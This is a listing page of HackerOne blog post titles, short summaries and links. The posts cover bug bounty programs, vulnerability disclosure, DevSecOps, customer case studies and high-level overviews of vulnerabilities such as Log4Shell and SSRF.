https://www.hackerone.com/application-security/security-highlights-new-cwe-rankings-software-supply-chains-and-side-channel

5 Security Stages of the DevSecOps Pipeline
DevSecOps builds on modern DevOps practices by incorporating security processes and automation into the development pipeline. This enables development teams to continue the rapid and continuous delivery trend while improving software assets' security. The DevSecOps pipeline follows the familiar DevOps “infinity loop” structure while incorporating some extra steps to ensure code security before, during, and after it's pushed to production.
https://www.hackerone.com/application-security/5-security-stages-devsecops-pipeline

Hacker's Health: Adverse Effects of Doomscrolling

https://www.hackerone.com/community-blog/hackers-health-adverse-effects-doomscrolling

The Most Overlooked Server Permission Checks

https://www.hackerone.com/application-security/most-overlooked-server-permission-checks

DevSecOps vs DevOps: What is the Difference?
DevSecOps can dramatically reduce cyber risk for organizations—particularly those that rely on internal development for a competitive advantage.
https://www.hackerone.com/application-security/devsecops-vs-devops-what-difference

HackerOne's In-Depth Approach to Vulnerability Triage and Validation

https://www.hackerone.com/hackerones-depth-approach-vulnerability-triage-and-validation

How Bug Bounty Uncovered A 5-Year-Old Vulnerability In Hours

https://www.hackerone.com/ethical-hacker/how-bug-bounty-uncovered-5-year-old-vulnerability-hours

Live Hacking Event Invitations - 2022 Guide

https://www.hackerone.com/community-blog/live-hacking-event-invitations-2022-guide

CISOs: Do You Know the Security Risks of Your Organization's Next M&A?
An ever-expanding attack surface is a global concern for most organizations and complicates an M&A, especially for CISOs. The M&A prospect may have a partially unprotected attack surface, thus increasing security risk coming in the form of a gap between the attack surface they can and do protect and the attack surface (and accompanying assets) they need to defend. This gap is what many M&A prospects bring to the table. And while an M&A may have undisputed business and strategic value, CISOs must still address the security risks involved in acquiring another organization's assets and its current attack surface, fully protected or not.
https://www.hackerone.com/vulnerability-management/cisos-do-you-know-security-risks-your-organizations-next-ma

H1 Community Team: Your Hacker Allies

https://www.hackerone.com/hackerone-community-blog/h1-community-team-your-hacker-allies

Community at HackerOne: What's to Come

https://www.hackerone.com/community-blog/community-hackerone-whats-come

The Top 5 Most Common Security Issues I Discover When Reviewing Code

https://www.hackerone.com/top-5-most-common-security-issues-i-discover-when-reviewing-code

How to Catch Injection Security Vulnerabilities in Code Review
Injection vulnerabilities result from insecure handling of user inputs. They are relatively simple to fix once the underlying issues that cause them are understood, and are frequently found by experienced reviewers who know what to look for. The prevalence of injection vulnerabilities today is one of the best arguments for continuing to perform code review in many organizations—this type of vulnerability is most frequently caught through human inspection of the offending code.
https://www.hackerone.com/vulnerability-management/how-catch-injection-security-vulnerabilities-code-review

Severe Confluence Vulnerability is an Active Threat (CVE-2022-26134)

https://www.hackerone.com/application-security/severe-confluence-vulnerability-active-threat-cve-2022-26134

How Critical Infrastructure Can be Protected from Threats
Accessing a major critical infrastructure network is very appealing to cybercriminals, as they can maximize societal impact and demand large ransom sums to fix tampered systems. With recent high-profile attacks, including that against the Colonial Pipeline in March 2021, it has become clear that the organizations handling critical infrastructure networks are now in the firing line. Critical infrastructure is vulnerable to both threat groups that are evolving their tactics and public scrutiny if they do not remain transparent when an attack occurs.
https://www.hackerone.com/vulnerability-management/how-critical-infrastructure-can-be-protected-threats

Ethical Hackers Help Beiersdorf Minimize Risk and Protect Their Attack Surface
After a year of running a private Vulnerability Disclosure Program (VDP), Beiersdorf is announcing the launch of its public VDP. HackerOne met with Kai Widua, Chief Information Security Officer (CISO) at Beiersdorf, to learn about the challenges they face in retail security.
https://www.hackerone.com/customer-stories/ethical-hackers-help-beiersdorf-minimize-risk-and-protect-their-attack-surface

What Is a Security.txt File and How Can It Help Your Program?

https://www.hackerone.com/security-compliance/what-securitytxt-file-and-how-can-it-help-your-program

5 Ways I Provide Value as a PullRequest Reviewer When I Start Reviewing a New Project
Important reviewer traits for providing a great code review include prior knowledge and experience, expertise, background context, attention to detail, and written communication skills. As a reviewer on PullRequest, I need to quickly gain context when I'm reviewing a project for the first time. But as is the case for any engineer new to a team, some context is gained over time.
https://www.hackerone.com/application-security/5-ways-i-provide-value-pullrequest-reviewer-when-i-start-reviewing-new-project

HackerOne Announces a New Customer Pentest Setup that's More Efficient and Speeds Time to Launch

https://www.hackerone.com/assessments/hackerone-announces-new-customer-pentest-setup-thats-more-efficient-and-speeds-time

Understanding Public and Private Bug Bounties and Vulnerability Disclosure Programs

https://www.hackerone.com/vulnerability-management/understanding-public-and-private-bug-bounties-and-vulnerability-disclosure

What is Attack Resistance Management?
A Security Survey on How to Close Your Organization's Attack Resistance Gap
https://www.hackerone.com/company-news/what-attack-resistance-management

Why HackerOne Acquired Pull Request and What It Means to Our Customers

https://www.hackerone.com/company-news/why-hackerone-acquired-pull-request-and-what-it-means-our-customers

Announcing the Results of the 12-month DIB-VDP Pilot

https://www.hackerone.com/vulnerability-disclosure/announcing-results-12-month-dib-vdp-pilot

How Wix Improves Their Security Posture with Ethical Hackers
Reducing risk is fundamental to Wix's approach to cybersecurity, and as the threat landscape evolves, they turn to HackerOne Bounty to protect their security posture. Since 2018, Wix has invited tens of thousands of ethical hackers worldwide to ensure new and existing features are secure. We recently met with two Wix security team members to learn how they leverage ethical hackers to detect risks before they become threats and how vulnerability insights help strengthen their security posture.
https://www.hackerone.com/customer-stories/how-wix-improves-their-security-posture-ethical-hackers

Announcing the HackerOne 2022 Attack Resistance Report: A Security Survey—How to Close Your Organization's Attack Resistance Gap
Today, HackerOne published The 2022 Attack Resistance Report: A HackerOne Security Survey. Our research revealed an increasing gap—the attack resistance gap—between what organizations can defend and what they need to defend. The gap is the result of four components prevalent across organizations.
https://www.hackerone.com/company-news/announcing-hackerone-2022-attack-resistance-report-security-survey-how-close-your

How Ethical Hackers Help A.S. Watson Address Digital Risk
We recently met with A.S. Watson's Chief Information Security Officer (CISO), Feliks Voskoboynik, to learn how ethical hackers have helped with digital transformation and enabled his team to harden their attack surface. Read on to learn Feliks' advice on including a bug bounty program as part of a security strategy, the lessons ethical hackers have provided, and what best practices he can share with other CISOs.
https://www.hackerone.com/customer-stories/how-ethical-hackers-help-watson-address-digital-risk

Preventing Compromised Password Reuse on HackerOne.com

https://www.hackerone.com/best-practices/preventing-compromised-password-reuse-hackeronecom

Shifting Left with Ethical Hackers: A Q&A with GitLab
Secure applications start with secure code. As organizations deploy code faster than ever, implementing continuous security across the software development lifecycle (SDLC) is critical to building secure products. As a long-time HackerOne Bounty customer, GitLab knows the importance of identifying and addressing bugs as early as possible in the SDLC. We wanted to hear what they had to say about leveraging the human intelligence of ethical hackers to broadly test their attack surface and increase their ability to resist potential threats.
https://www.hackerone.com/bounty/shifting-left-ethical-hackers-qa-gitlab

Donating Bounties to Humanitarian Efforts in Ukraine

https://www.hackerone.com/donating-bounties-humanitarian-efforts-ukraine

Securing Digital Transformation with Vulnerability Disclosure: A Q&A with John Deere CISO, James Johnson
To help fortify security defenses for their customers, dealers, suppliers, and employees, John Deere recently launched a public Vulnerability Disclosure Program (VDP) with HackerOne. HackerOne recently met with James Johnson, CISO at John Deere, to learn why his security team works with ethical hackers to help identify security gaps and increase their product and data security.
https://www.hackerone.com/vulnerability-disclosure/securing-digital-transformation-vulnerability-disclosure-qa-john-deere

The Only Solution That Scales With the Cybersecurity Challenge

https://www.hackerone.com/ceo/only-solution-scales-cybersecurity-challenge

Nine Months into the DIB-VDP Pilot, Nearly 1,000 Valid Vulnerabilities Have Been Identified
With three months left in the 12-month pilot with the Department of Defense's Defense Industrial Base Vulnerability Disclosure Pilot (DOD DIB-VDP Pilot), HackerOne sat down with DC3 to discuss why new DIB companies are joining the pilot and hear why hackers are a critical partner for the DOD.
https://www.hackerone.com/customer-stories/nine-months-dib-vdp-pilot-nearly-1000-valid-vulnerabilities-have-been-identified

The HackerOne Global Top 10—Hacker Expertise, Industry Data, and Up-to-Date Vulnerabilities

https://www.hackerone.com/vulnerability-management/hackerone-global-top-10-hacker-expertise-industry-data-and-date

Log4Shell: Attack Evolution
HackerOne has unique visibility into the global response to Log4Shell, seeing in real time how organizations responded and remediated. Last week HackerOne's CISO Chris Evans and Co-founder Jobert Abma shared findings from our platform.
https://www.hackerone.com/vulnerability-management/log4shell-attack-evolution

Top 5 Takeaways from the 2021 Hacker-Powered Security Report: Industry Insights

https://www.hackerone.com/hacker-powered-security-report/top-5-takeaways-2021-hacker-powered-security-report-industry

CWE [Common Weakness Enumeration] | Why It Is Important
Are you wondering about CWE? We explain CWE (Common Weakness Enumeration) and why this community-based initiative is essential in cybersecurity
https://www.hackerone.com/vulnerability-management/cwe-common-weakness-enumeration-why-it-important

Log4j Vulnerability Activity on the HackerOne Platform
This post is about the severe and widespread Log4j vulnerability. It gives a technical overview of the vulnerability, mitigations HackerOne has put in place to protect our platform and customers, and the related vulnerability submission activity HackerOne is seeing on its platform.
https://www.hackerone.com/vulnerability-management/log4j-vulnerability-activity-hackerone-platform

Common Vulnerability Scoring System [CVSS] | A Complete Explanation
Were you wondering about the Common Vulnerability Scoring System (CVSS)? We explain what CVSS is, why it is important, and show how to prioritize vulnerabilities based on their score.
https://www.hackerone.com/vulnerability-management/common-vulnerability-scoring-system-cvss-complete-explanation

How Hackers Help Organizations Face New Attack Vectors and Build Stronger Security Programs
The risk of cyberattacks grows every day. But there is an essential defensive step that organizations can take: hacker-powered security programs.
https://www.hackerone.com/security-event/how-hackers-help-organizations-face-new-attack-vectors-and-build-stronger-security

Vulnerability Management | A Complete Guide and Best Practices
We explain what vulnerability management is and why it matters, and we give a step-by-step guide to implementing a vulnerability management process.
https://www.hackerone.com/vulnerability-management/vulnerability-management-complete-guide-and-best-practices

Securing the Supply Chain by Working With Ethical Hackers
Software supply chain attacks increasingly create concern among cybersecurity experts as these exploits are becoming more common. But solving the problem has left organizations scrambling for an answer because supply-chain security management is inherently complex.
https://www.hackerone.com/vulnerability-management/securing-supply-chain-working-ethical-hackers

TikTok Celebrates One Year of Bug Bounty
As part of an ongoing commitment to proactive cybersecurity, TikTok celebrated its one-year anniversary of HackerOne bug bounty by thanking (via video, of course!) 150+ hackers from around the globe who have helped them identify and resolve more than 225 vulnerabilities. They also share insights into assets in scope, their commitment to transparency, and their best-in-class payout and response time metrics.
https://www.hackerone.com/customer-stories/tiktok-celebrates-one-year-bug-bounty

Bug Bounty Platforms [Best Choices For a Bug Bounty Program]
Are you wondering about bug bounty platforms? We explain what a bug bounty platform is and how it can help you run a successful bug bounty program.
https://www.hackerone.com/vulnerability-management/bug-bounty-platforms-best-choices-bug-bounty-program

How Elastic Attracts and Retains Top Hackers Without Offering the Highest Bounties
Skilled hackers are the foundation of an effective bug bounty program. But how can you ensure your program attracts top hackers and keeps them engaged?
https://www.hackerone.com/how-elastic-attracts-and-retains-top-hackers-without-offering-highest-bounties

How Hackers Can Strengthen Cloud Security for Applications
In this session at our 5th annual global cybersecurity conference, HackerOne's Tim Matthews sat down with Josh Bressers, Tech Lead of Product Security at Elastic, to discuss cloud security for applications. They focused on the challenges around cloud security and the role of hacker-powered defensive efforts. Josh's organization, Elastic, is the leading enterprise search company with expertise in building self-managed services for search, logging, security, and analytics use cases.
https://www.hackerone.com/ethical-hacker/how-hackers-can-strengthen-cloud-security-applications

What Is a Bug Bounty? Should You Offer One? And How To Do It

https://www.hackerone.com/vulnerability-management/what-bug-bounty-should-you-offer-one-and-how-do-it

Bug Bounty vs. VDP | Which Program Is Right for You?
We explain bug bounty programs and Vulnerability Disclosure Programs (VDPs), their pros and cons, and how each can help your organization.
https://www.hackerone.com/vulnerability-management/bug-bounty-vs-vdp-which-program-right-you

How to Use Bug Bounty Program Data to Improve Security and Development
Bug bounty program data tells a story—but which story? Tracking program metrics can help organizations identify issues, spot opportunities, and take corrective actions. To do this, stakeholders must know which metrics to track and how to interpret the results.
https://www.hackerone.com/vulnerability-management/how-use-bug-bounty-program-data-improve-security-and-development

DOD's DIB-VDP Pilot Hits Six Month Milestone
Six months into the 12-month pilot with the Department of Defense's Defense Industrial Base Vulnerability Disclosure Pilot (DOD DIB-VDP Pilot), HackerOne sat down with key stakeholders from the DIB-VDP Pilot to discuss the program's success to date, the Federal Government's strategy for working with hackers, and to hear about some of the most impactful vulnerabilities discovered to date.
https://www.hackerone.com/customer-stories/dods-dib-vdp-pilot-hits-six-month-milestone

Vulnerability Disclosure | What's the Responsible Solution?
Curious about vulnerability disclosure? We explain what it is, why there may be friction between the researcher and the organization, and possible solutions.
https://www.hackerone.com/vulnerability-disclosure/vulnerability-disclosure-whats-responsible-solution

Jedox's Journey with HackerOne: A Q&A with CTO, Vladislav Maličević
Jedox secures their cloud - and their customers - with HackerOne Assessments and HackerOne Bounty. Read this blog to learn how they're creating a best-in-class cybersecurity program thanks to ethical hackers.
https://www.hackerone.com/best-practices/jedoxs-journey-hackerone-qa-cto-vladislav-malicevic

DevSecOps: Bridging the Gap Between Security and Development
Organizations that rely on developing secure, functional products understand the value of increased collaboration between security and development teams. Tighter partnerships between the two teams can allow organizations to deliver better, safer products faster, but how can this work in the real world?
https://www.hackerone.com/security-event/devsecops-bridging-gap-between-security-and-development

How Trustpilot Manages Risk by Working with Ethical Hackers
At our 2021 Security@ conference, we spoke with Stu Hirst, CISO at consumer review site Trustpilot. Trustpilot's mission is to create an independent currency of trust between consumers and businesses, and cybersecurity plays a central role.
https://www.hackerone.com/bounty/how-trustpilot-manages-risk-working-ethical-hackers

What's a Vulnerability Disclosure Program & Do You Need One?
Are you wondering about Vulnerability Disclosure Programs (VDPs)? Here's why you need one, and instructions on starting one or improving your current process.
https://www.hackerone.com/vulnerability-disclosure/whats-vulnerability-disclosure-program-do-you-need-one

Bug Bounty Benefits | Why You Need a Bug Bounty Program
We explain how a bug bounty program identifies vulnerabilities, discuss the program's benefits, and detail its challenges.
https://www.hackerone.com/bounty/bug-bounty-benefits-why-you-need-bug-bounty-program

Navigating a Safe, Successful Return to Office: 5 Tips for Security Leaders
Security leaders have a lot on their plates in these later stages of the continuing COVID-19 pandemic. In a 2021 survey by Gartner, over three-quarters (76%) of respondents reported increased demand for new digital products or services during the pandemic — and 83% expected this demand to continue to increase. This imperative for transformation has been coming straight from the top: 69% of boards report accelerating digital business initiatives in response to COVID-19.
https://www.hackerone.com/company-news/navigating-safe-successful-return-office-5-tips-security-leaders

Vulnerability Remediation | A Step-by-Step Guide
Are you wondering about vulnerability remediation? We give you a step-by-step guide to addressing vulnerabilities in your system.
https://www.hackerone.com/vulnerability-remediation-step-step-guide

How Hackers—the Best Kept Secret in Cybersecurity—Can Help Your Organization Protect its Assets and Improve Security
Last week, HackerOne held its fifth annual one-of-a-kind global Security@ conference featuring the best-kept secret in cybersecurity—hackers.
https://www.hackerone.com/ethical-hacker/how-hackers-best-kept-secret-cybersecurity-can-help-your-organization-protect-its

The Top 5 Cloud Security Risks: How Hacker-Powered Security Can Help
Widespread digital transformation means increased cloud security risk. Learn how human intelligence—hacker-powered security—can help your organization defend against new attack vectors, mitigate risk, and improve cloud security.
https://www.hackerone.com/application-security/top-5-cloud-security-risks-how-hacker-powered-security-can-help

Time to Issue Your Own Cyber Executive Order

https://www.hackerone.com/from-the-ceo/time-issue-your-own-cyber-executive-order

Vulnerability Testing | Best Techniques for Assessing Risks
Curious about vulnerability testing techniques? We explain processes such as vulnerability assessments, vulnerability scanning, and penetration testing.
https://www.hackerone.com/vulnerability-management/vulnerability-testing-best-techniques-assessing-risks

How Hacker-Powered Security Can Help Security Teams Become More Data-Driven

https://www.hackerone.com/vulnerability-management/how-hacker-powered-security-can-help-security-teams-become-more-data

Vulnerability Assessment Tools [Top Tools & What They Do]
Are you curious about the best vulnerability assessment tools? We detail some of the popular tools, what they do, and their pros and cons.
https://www.hackerone.com/vulnerability-management/vulnerability-assessment-tools-top-tools-what-they-do

Hacker-Powered Security and DeFi: How Human Intelligence Improves Cryptocurrency Security
Over the last year, DeFi has grown significantly with billions of dollars of cryptocurrency locked into blockchain contracts. With this growth comes increased risk and DeFi funds are lucrative targets for malicious actors. Learn how a HackerOne hacker helps protect DeFi funds and mitigate this risk.
https://www.hackerone.com/ethical-hacker/hacker-powered-security-and-defi-how-human-intelligence-improves-cryptocurrency

HackerOne Announces Hacker-Powered Cloud Security Capabilities for AWS Customers
HackerOne announces new capabilities for AWS customers looking to improve security in their cloud applications. These include vulnerability pentests specific to AWS environments, an AWS Security Hub integration for fast, effective security actions, and AWS Certified hackers. AWS customers can now identify and fix vulnerabilities quickly and develop a better understanding of their cloud application security profile.
https://www.hackerone.com/penetration-testing/hackerone-announces-hacker-powered-cloud-security-capabilities-aws-customers

How a New HackerOne Integration with AWS Security Hub Accelerates Vulnerability Remediation Time
HackerOne announced an integration with AWS Security Hub that exchanges vulnerability findings and streamlines workflows to accelerate security actions. The integration consolidates and routes vulnerability intelligence from HackerOne to AWS Security Hub, delivering greater visibility into crucial gaps that could lead to a cyberattack.
https://www.hackerone.com/company-news/how-new-hackerone-integration-aws-security-hub-accelerates-vulnerability-remediation

The DOD Improves Their Security Posture Through the DIB-VDP
One of the primary missions of the Defense Counterintelligence and Security Agency (DCSA) is to provide critical technology protection to the Defense Industrial Base (DIB). Given the recent increase in cyber incidents affecting the DIB, DCSA views the DIB-VDP Pilot as a promising way to identify and stop attempts at stealing our Nation's secrets.
https://www.hackerone.com/vulnerability-disclosure/dod-improves-their-security-posture-through-dib-vdp

Hyatt's Bug Bounty Program Update: Q&A with Senior Analyst Robert Lowery
Hyatt's three-year-old bug bounty program has reached a significant milestone: 0,000 in bounties paid to hackers. As the first organization in the hospitality industry to embrace hacker-powered security, Hyatt's milestone today demonstrates its long-term commitment to setting the highest standard for cybersecurity. We sat down with Robert Lowery, Senior Analyst at Hyatt, to learn more about the history of Hyatt's bug bounty program and their most recent 0,000 milestone. Read on to see what Robert shared on how the knowledge of the global security researcher community helps Hyatt reduce risk, enable security improvements, and ultimately, deliver on their promise to care for employees, guests, and shareholders alike so they can be their best.
https://www.hackerone.com/bounty/hyatts-bug-bounty-program-update-qa-senior-analyst-robert-lowery

Why security transparency makes for good corporate governance

https://www.hackerone.com/resources/wistia-webinars/blackhat-marten-mickos

One Month of Learnings from Flo Health's Bug Bounty Program: A Q&A with CISO, Leo Cunningham

https://www.hackerone.com/vulnerability-management/one-month-learnings-flo-healths-bug-bounty-program-qa-ciso-leo-cunningham

Vulnerability Assessment | A Complete Guide

https://www.hackerone.com/vulnerability-management/vulnerability-assessment-i-complete-guide

What We Can Learn From Recent Ransomware Attacks

https://www.hackerone.com/vulnerability-management/what-we-can-learn-recent-ransomware-attacks

How to Use HackerOne and PagerDuty to Identify When Vulnerabilities Need Action

https://www.hackerone.com/vulnerability-management/how-use-hackerone-and-pagerduty-identify-when-vulnerabilities-need-action

What Are Bug Bounties? How Do They Work? [With Examples]

https://www.hackerone.com/vulnerability-management/what-are-bug-bounties-how-do-they-work-examples

How the Industry's First Hacker-Powered API Helps Hackers Automate Workflows

https://www.hackerone.com/application-security/how-industrys-first-hacker-powered-api-helps-hackers-automate-workflows

How HackerOne Positively Influences Zebra's Software Development Life Cycle

https://www.hackerone.com/vulnerability-management/zebra-secure-development-lifecycle

Bug Bounty vs. CTF [Understanding Differences & Benefits]
Trying to understand the difference between a bug bounty vs. CTF? We explain the differences, the similarities, and the benefits of each.
https://www.hackerone.com/community-blog/bug-bounty-vs-ctf-understanding-differences-benefits

Bug Bounty vs. Penetration Testing: Differences Explained

https://www.hackerone.com/penetration-testing/bug-bounty-vs-penetration-testing-differences-explained

HackerOne in DevSecOps

https://www.hackerone.com/vulnerability-disclosure/hackerone-devsecops

What is Vulnerability Scanning? [And How to Do It Right]

https://www.hackerone.com/vulnerability-management/what-vulnerability-scanning-and-how-do-it-right

HOW HACKERONE AND GITHUB NOW WORK BETTER TOGETHER

https://www.hackerone.com/vulnerability-management/how-hackerone-and-github-now-work-better-together

Citrix's Hacker-Powered Security Growth Plan: Q&A with Abhijith Chandrashekar

https://www.hackerone.com/vulnerability-management/citrixs-hacker-powered-security-growth-plan-qa-abhijith-chandrashekar

How Hackers Can Help Reduce Your Organization's Application Risk on AWS

https://www.hackerone.com/vulnerability-management/how-hackers-can-help-reduce-your-organizations-application-risk-aws

What Is Penetration Testing? How Does It Work Step-by-Step?

https://www.hackerone.com/penetration-testing/what-penetration-testing-how-does-it-work-step-step

60 Days of Insights from the DOD's Defense Industrial Base Vulnerability Disclosure Program Pilot

https://www.hackerone.com/vulnerability-management/60-days-insights-dods-defense-industrial-base-vulnerability-disclosure

ANNOUNCING HACK THE ARMY 3.0 RESULTS: A CONVERSATION WITH DEFENSE DIGITAL SERVICE, U.S. ARMY, AND HACK THE ARMY 3.0'S TOP HACKER

https://www.hackerone.com/blog/announcing-hack-army-30-results-conversation-defense-digital-service-us-army-and-hack-army

BUILD A RESILIENT SECURITY POSTURE WITH VULNERABILITY INTELLIGENCE AND CYBERSECURITY RATINGS

https://www.hackerone.com/vulnerability-management/build-resilient-security-posture-vulnerability-intelligence-and

HACK HARD. HAVE FUN. INCREASE SECURITY

https://www.hackerone.com/community-blog/hack-hard-have-fun-increase-security

HOW DIGITAL TRANSFORMATION CHANGES AN ORGANIZATION'S SECURITY CHALLENGES

https://www.hackerone.com/vulnerability-management/how-digital-transformation-changes-organizations-security-challenges

MICROSOFT SAYS: RUSSIAN SOLARWINDS HACKERS HIT U.S. GOVERNMENT AGENCIES AGAIN

https://www.hackerone.com/vulnerability-management/microsoft-says-russian-solarwinds-hackers-hit-us-government-agencies-again

Spotlight on the Server-Side
Server-side request forgery (or SSRF) vulnerabilities are particularly dangerous because they can lead to total system compromise. Discover where they're most common, explore real-world examples, and learn prevention tips from hackers.
https://www.hackerone.com/application-security/spotlight-server-side

5 Secrets of a Mature Vulnerability Management Program from Costa Coffee and Priceline
During HackerOne's recent series of webinars, we caught up with Matt Southworth, CISO of Priceline, and Matt Adams, Global Security Architect at Costa Coffee, to learn their 5 secrets to building a highly effective vulnerability management program.
https://www.hackerone.com/vulnerability-management/5-secrets-mature-vulnerability-management-program

A Security Engineer and Hacker Share Their Experiences with Security Assessments
A few weeks ago, HackerOne and PortSwigger teamed up to shine a light on the innovative ways that customers and security analysts are scaling risk assessments. Read on for key learnings.
https://www.hackerone.com/ethical-hacker/security-engineer-and-hacker-share-their-experiences-security-assessments

Saxo Bank Celebrates One Year of Bug Bounties: Q&A with CISO Mads Syska Hasling

https://www.hackerone.com/vulnerability-management/saxo-bank-celebrates-one-year-bug-bounties-qa-ciso-mads-syska-hasling

How HackerOne Helps the Vulnerability Management Process
HackerOne sees vulnerability management as a process combining software tools and security analyst actions to reduce risk. In many cases, successful Vulnerability Management requires a joint effort between security operations, who find vulnerabilities, and IT operations responsible for fixing, or patching, vulnerabilities.
https://www.hackerone.com/vulnerability-management/how-hackerone-helps-vulnerability-management-process

Reddit's Bug Bounty Program Kicks Off: Q&A with Reddit's Allison Miller and Spencer Koch, and Top Program Hacker @RENEKROKA
HackerOne sat down with Reddit's CISO and VP of Trust, resident Security Wizard, and top hacker to discover the secrets to Reddit's bug bounty success, explore their goals and key results, delve into how they use hackers to scale security across software development, and gain a unique perspective about what it's like to hack one of the world's leading social networks.
https://www.hackerone.com/application-security/reddits-bug-bounty-program-kicks-qa-reddits-allison-miller-and-spencer-koch

Security@ 2021 Call for Speakers is Open
HackerOne's global hacker-powered security conference, Security@, is back for its fifth year. This year's virtual event will take place September 20, 2021. The call for speakers is now open! You have until May 15, 2021, to submit your talk.
https://www.hackerone.com/company-news/security-2021-call-speakers-open

The Rise of IDOR
Insecure Direct Object References (or IDOR) is a simple bug that packs a punch. Discover where they're most common, explore real-world examples, and learn prevention tips from hackers.
https://www.hackerone.com/company-news/rise-idor

PayPal is our Virtual Pal
HackerOne teams up with event partner PayPal to share experiences from its second virtual live hacking event.
https://www.hackerone.com/vulnerability-management/paypal-our-virtual-pal

Commerce Giant Shopify Kicks Off 2021 with HackerOne (Virtual) Live Hacking Event: h1-2102
HackerOne's first virtual live hacking event of the year kicked off with Shopify in January 2021. Read this blog post to learn more about how Shopify builds relationships with hackers through live events like h1-2102, and find out who the award winners are.
https://www.hackerone.com/community-blog/commerce-giant-shopify-kicks-2021-hackerone-virtual-live-hacking-event-h1-2102

The Rise of Misconfiguration and Supply Chain Vulnerabilities
The vulnerability of supply chains has been top of mind since the SolarWinds attack, which still dominates headlines, but last week's Singtel breach also reflects the rise of breaches triggered by misconfiguration vulnerabilities.
https://www.hackerone.com/vulnerability-management/rise-misconfiguration-and-supply-chain-vulnerabilities

2020 Hacker Community Year in Review
From CTFs to virtual live hacking events and more, check out this recap of the initiatives HackerOne hosted for the hacker community in 2020.
https://www.hackerone.com/community-blog/2020-hacker-community-year-review

Announcing The Hacker of The Hill

https://www.hackerone.com/ethical-hacker/announcing-hacker-hill

5 Learnings From A Conversation With OP Financial Group's CISO And @mrtuxracer
On 20 January, HackerOne's CEO, Marten Mickos, sat down for a chat with European hacker, Julien Ahrens a.k.a @mrtuxracer, and Teemu Ylhäisi, CISO at OP Financial Group. The discussion ranged from the recent SolarWinds attacks to the best way to prevent phishing. Here are our top takeaways from the webinar.
https://www.hackerone.com/application-security/5-learnings-conversation-op-financial-groups-ciso-and-mrtuxracer

LINE on Securing the Application Development Lifecycle with Bug Bounties
HackerOne has a large hacker community and the platform necessary to operate LINE's bug bounty program. By using HackerOne's platform and welcoming the community, LINE can increase operational efficiency. Through the partnership with HackerOne, we can share new bugs and learn from the vulnerability trends on the Platform while also getting a guide that helps us create a successful bug bounty program.
https://www.hackerone.com/application-security/line-securing-application-development-lifecycle-bug-bounties

What Years of AWS Hacking Tells Us About Building Secure Apps
Years of AWS bug bounties have exposed SSRF vulnerabilities, misconfigurations, and dangling DNS records. What can we learn from these vulnerabilities about mitigating risk?
https://www.hackerone.com/application-security/what-years-aws-hacking-tells-us-about-building-secure-apps

Grab Celebrates 5 Years on HackerOne
"Just five years ago, leading rideshare, food delivery, and payments company Grab became one of the first companies in Southeast Asia to implement a hacker-powered security program. In just three years Grab became one of the Top 20 bug bounty programs on HackerOne worldwide."
https://www.hackerone.com/company-news/grab-celebrates-5-years-hackerone

HackerOne Policies Update
HackerOne's Policies Received Updates - check them out now!
https://www.hackerone.com/company-news/hackerone-policies-update

The World's Largest Live Hacking Event
HackerOne and The Paranoids partnered to bring you the largest live hacking event in the world
https://www.hackerone.com/community-blog/worlds-largest-live-hacking-event

Quantifying Risk: How do you measure success in security?
When your job is all about avoiding costly incidents and mistakes, it's hard to put a dollar value on your work. At HackerOne's recent Security@ conference, Slack and Hyatt's CISOs sat down for a chat about their challenges and the hacks they use to quantify risk:
https://www.hackerone.com/application-security/quantifying-risk-how-do-you-measure-success-security

12 Days of Hacky Holidays CTF

https://www.hackerone.com/ethical-hacker/12-days-hacky-holidays-ctf

VDPs are at the Heart of the Australian Cyber Security Centre's Recommendations

https://www.hackerone.com/vulnerability-management/vdps-are-heart-australian-cyber-security-centres-recommendations

HackerOne Joins AWS Marketplace as Cloud Vulnerabilities Rise
HackerOne reveals the most common and critical vulnerabilities found in cloud infrastructure and announces its debut in AWS Marketplace.
https://www.hackerone.com/application-security/hackerone-joins-aws-marketplace-cloud-vulnerabilities-rise

Announcing the HackerOne Brand Ambassadors
Announcing the first group of Hacker Brand Ambassadors who will lead hackers in their local area.
https://www.hackerone.com/community-blog/announcing-hackerone-brand-ambassadors

US Government Mandates Vulnerability Disclosure for IoT

https://www.hackerone.com/vulnerability-management/us-government-mandates-vulnerability-disclosure-iot

Announcing new leaderboards: More ways to engage, compete and win

https://www.hackerone.com/ethical-hacker/announcing-new-leaderboards-more-ways-engage-compete-and-win

HackerOne is Excited to Launch Triage Ratings for Customers and Hackers

https://www.hackerone.com/application-security/hackerone-excited-launch-triage-ratings-customers-and-hackers

NIST Overhauls “Security and Privacy Controls” and Emphasizes VDP as a Best Practice

https://www.hackerone.com/security-compliance/nist-overhauls-security-and-privacy-controls-and-emphasizes-vdp-best-practice

Snap's Security Team on Nearly 6 Years of Collaborating with Hackers

https://www.hackerone.com/vulnerability-management/snaps-security-team-nearly-6-years-collaborating-hackers

Organizations Paid Hackers $23.5 Million for These 10 Vulnerabilities in One Year
HackerOne report reveals cross-site scripting, improper access control, and information disclosure top list of most common and impactful vulnerabilities
https://www.hackerone.com/ethical-hacker/organizations-paid-hackers-235-million-these-10-vulnerabilities-one-year

HackerOne Expands Integrations Ecosystem to Connect and Defend Customers

https://www.hackerone.com/vulnerability-management/hackerone-expands-integrations-ecosystem-connect-and-defend-customers

HackerOne Integrates with ServiceNow to Streamline Vulnerability Lifecycle Management
We're excited to announce our integration with ServiceNow Incident Management. This integration allows customers to escalate vulnerability reports with ServiceNow incidents and synchronize any updates in the vulnerability workflow that happen in ServiceNow or HackerOne.
https://www.hackerone.com/vulnerability-management/hackerone-integrates-servicenow-streamline-vulnerability-lifecycle

AT&T Celebrates $1 Million Awarded to Hackers in One Year
AT&T recently celebrated its first anniversary on HackerOne, passing $1 million in payouts to more than 850 researchers worldwide. Read on to learn more about their program and successes over the last year.
https://www.hackerone.com/ethical-hacker/att-celebrates-1-million-awarded-hackers-one-year

Introducing the 4th Annual Hacker-Powered Security Report

https://www.hackerone.com/ethical-hacker/introducing-4th-annual-hacker-powered-security-report

H1-2010 FAQs
FAQs from HackerOne's biggest virtual live hacking event with The Paranoids from Verizon Media, H1-2010.
https://www.hackerone.com/company-news/h1-2010-faqs

Vulnerability Disclosure is Now Mandatory for Federal Agencies - Here's How to Make it Happen

https://www.hackerone.com/vulnerability-management/vulnerability-disclosure-now-mandatory-federal-agencies-heres-how-make-it

Smartsheet Celebrates One Year with HackerOne
To mark Smartsheet's one-year anniversary with HackerOne, we sat down with Nolan Gibb, Information Security Engineer at Smartsheet, to discuss how bug bounties enable his team to scale and collaborate with software developers to create more secure products.
https://www.hackerone.com/vulnerability-management/smartsheet-celebrates-one-year-hackerone

